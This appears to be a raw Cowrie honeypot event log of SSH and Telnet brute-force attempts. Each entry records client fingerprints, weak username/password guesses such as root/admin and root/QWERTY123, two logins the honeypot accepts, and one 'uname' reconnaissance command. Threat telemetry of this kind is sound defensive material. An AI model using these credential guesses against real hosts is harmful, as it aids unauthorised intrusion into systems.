{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:33:24.571501Z","src_ip":"51.79.164.132","session":"fef0aaaa0c16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:33:24.572198Z","src_ip":"51.79.164.132","session":"fef0aaaa0c16"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:27.773907Z","src_ip":"51.79.164.132","session":"fef0aaaa0c16"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:28.992743Z","src_ip":"51.79.164.132","session":"fef0aaaa0c16"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":46452,"dst_ip":"1.2.3.4","dst_port":22,"session":"8745ccd56cea","protocol":"ssh","message":"New connection: 185.93.89.7:46452 (1.2.3.4:22) [session: 8745ccd56cea]","sensor":"my-vps","timestamp":"2025-08-28T09:33:44.004460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:33:44.028310Z","src_ip":"185.93.89.7","session":"8745ccd56cea"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:33:44.029217Z","src_ip":"185.93.89.7","session":"8745ccd56cea"}
{"eventid":"cowrie.login.failed","username":"index","password":"159753","message":"login attempt [index/159753] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:44.095896Z","src_ip":"185.93.89.7","session":"8745ccd56cea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:45.120789Z","src_ip":"185.93.89.7","session":"8745ccd56cea"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34520,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8f7e0d53a87","protocol":"ssh","message":"New connection: 51.79.164.132:34520 (1.2.3.4:22) [session: d8f7e0d53a87]","sensor":"my-vps","timestamp":"2025-08-28T09:33:50.539577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:33:50.943748Z","src_ip":"51.79.164.132","session":"d8f7e0d53a87"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:33:50.944622Z","src_ip":"51.79.164.132","session":"d8f7e0d53a87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35456,"dst_ip":"1.2.3.4","dst_port":23,"session":"484d10691096","protocol":"telnet","message":"New connection: 212.227.235.229:35456 (1.2.3.4:23) [session: 484d10691096]","sensor":"my-vps","timestamp":"2025-08-28T09:33:53.518772Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:33:53.714807Z","src_ip":"212.227.235.229","session":"484d10691096"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:33:53.730154Z","src_ip":"212.227.235.229","session":"484d10691096"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:33:53.760225Z","src_ip":"51.79.164.132","session":"d8f7e0d53a87"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:33:54.949856Z","src_ip":"51.79.164.132","session":"d8f7e0d53a87"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":39810,"dst_ip":"1.2.3.4","dst_port":22,"session":"e22f6a4817b7","protocol":"ssh","message":"New connection: 185.93.89.7:39810 (1.2.3.4:22) [session: e22f6a4817b7]","sensor":"my-vps","timestamp":"2025-08-28T09:34:08.047042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:34:08.048086Z","src_ip":"185.93.89.7","session":"e22f6a4817b7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:34:08.073447Z","src_ip":"185.93.89.7","session":"e22f6a4817b7"}
{"eventid":"cowrie.login.failed","username":"index","password":"1111","message":"login attempt [index/1111] failed","sensor":"my-vps","timestamp":"2025-08-28T09:34:08.110981Z","src_ip":"185.93.89.7","session":"e22f6a4817b7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:34:09.132240Z","src_ip":"185.93.89.7","session":"e22f6a4817b7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43372,"dst_ip":"1.2.3.4","dst_port":22,"session":"32f54df0e176","protocol":"ssh","message":"New connection: 51.79.164.132:43372 (1.2.3.4:22) [session: 32f54df0e176]","sensor":"my-vps","timestamp":"2025-08-28T09:34:16.434371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:34:16.808386Z","src_ip":"51.79.164.132","session":"32f54df0e176"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:34:16.809399Z","src_ip":"51.79.164.132","session":"32f54df0e176"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:34:20.275995Z","src_ip":"51.79.164.132","session":"32f54df0e176"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:34:21.734702Z","src_ip":"51.79.164.132","session":"32f54df0e176"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43630,"dst_ip":"1.2.3.4","dst_port":22,"session":"c33f719f96b6","protocol":"ssh","message":"New connection: 185.93.89.7:43630 (1.2.3.4:22) [session: c33f719f96b6]","sensor":"my-vps","timestamp":"2025-08-28T09:34:32.684047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:34:32.691921Z","src_ip":"185.93.89.7","session":"c33f719f96b6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:34:32.711056Z","src_ip":"185.93.89.7","session":"c33f719f96b6"}
{"eventid":"cowrie.login.failed","username":"index","password":"123123123","message":"login attempt [index/123123123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:34:32.769469Z","src_ip":"185.93.89.7","session":"c33f719f96b6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:34:33.791276Z","src_ip":"185.93.89.7","session":"c33f719f96b6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47960,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb5fc4ddc303","protocol":"ssh","message":"New connection: 51.79.164.132:47960 (1.2.3.4:22) [session: eb5fc4ddc303]","sensor":"my-vps","timestamp":"2025-08-28T09:34:42.650747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:34:43.144510Z","src_ip":"51.79.164.132","session":"eb5fc4ddc303"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:34:43.145228Z","src_ip":"51.79.164.132","session":"eb5fc4ddc303"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T09:34:46.095071Z","src_ip":"51.79.164.132","session":"eb5fc4ddc303"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:34:47.285191Z","src_ip":"51.79.164.132","session":"eb5fc4ddc303"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":46058,"dst_ip":"1.2.3.4","dst_port":22,"session":"b840ec158c2b","protocol":"ssh","message":"New connection: 185.93.89.7:46058 (1.2.3.4:22) [session: b840ec158c2b]","sensor":"my-vps","timestamp":"2025-08-28T09:35:02.175254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:35:02.189903Z","src_ip":"185.93.89.7","session":"b840ec158c2b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:35:02.210602Z","src_ip":"185.93.89.7","session":"b840ec158c2b"}
{"eventid":"cowrie.login.failed","username":"index","password":"abcdef","message":"login attempt [index/abcdef] failed","sensor":"my-vps","timestamp":"2025-08-28T09:35:02.266716Z","src_ip":"185.93.89.7","session":"b840ec158c2b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:03.321328Z","src_ip":"185.93.89.7","session":"b840ec158c2b"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42026,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8362d2d8037","protocol":"ssh","message":"New connection: 51.79.164.132:42026 (1.2.3.4:22) [session: f8362d2d8037]","sensor":"my-vps","timestamp":"2025-08-28T09:35:09.794367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:35:10.078773Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:35:10.156865Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.login.success","username":"root","password":"QWERTY123","message":"login attempt [root/QWERTY123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:35:13.619385Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:35:14.320173Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:35:14.320962Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:35:14.541472Z","src_ip":"51.79.164.132","session":"f8362d2d8037"}
